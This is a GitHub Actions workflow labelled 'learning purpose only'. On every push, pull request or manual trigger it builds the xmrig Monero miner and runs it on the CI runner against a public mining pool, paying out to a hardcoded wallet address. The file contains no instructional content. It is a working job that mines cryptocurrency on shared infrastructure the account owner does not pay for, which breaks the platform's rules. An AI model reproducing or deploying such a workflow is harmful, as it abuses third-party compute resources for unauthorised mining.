name: xmr miner learning purpose only

on:
  push:
    branches: [ master ]  # Trigger on push to the master branch
  pull_request:
    branches: [ master ]  # Trigger on pull request to the master branch
  workflow_dispatch:
  
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v2

      - name: Installs xmrig
        run: |
          sudo apt update
          sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev
          git clone https://github.com/xmrig/xmrig.git
          mkdir xmrig/build && cd xmrig/build
          cmake ..
          make  # This step is essential to build xmrig

      - name: Runs xmrig
        run: |
          cd xmrig/build  # Ensure we're in the correct build directory
          ./xmrig -o pool.supportxmr.com:443 -u 49ucRzKeG7XZsdKfCswGEHQstBXpTgKZjFiCrNsqdQnvXBcYb8rDnAqEo8X3FQeve7QaRQqshEPCagDxnL2LVbXPCFb2qQu -k --tls --rig-id workflow
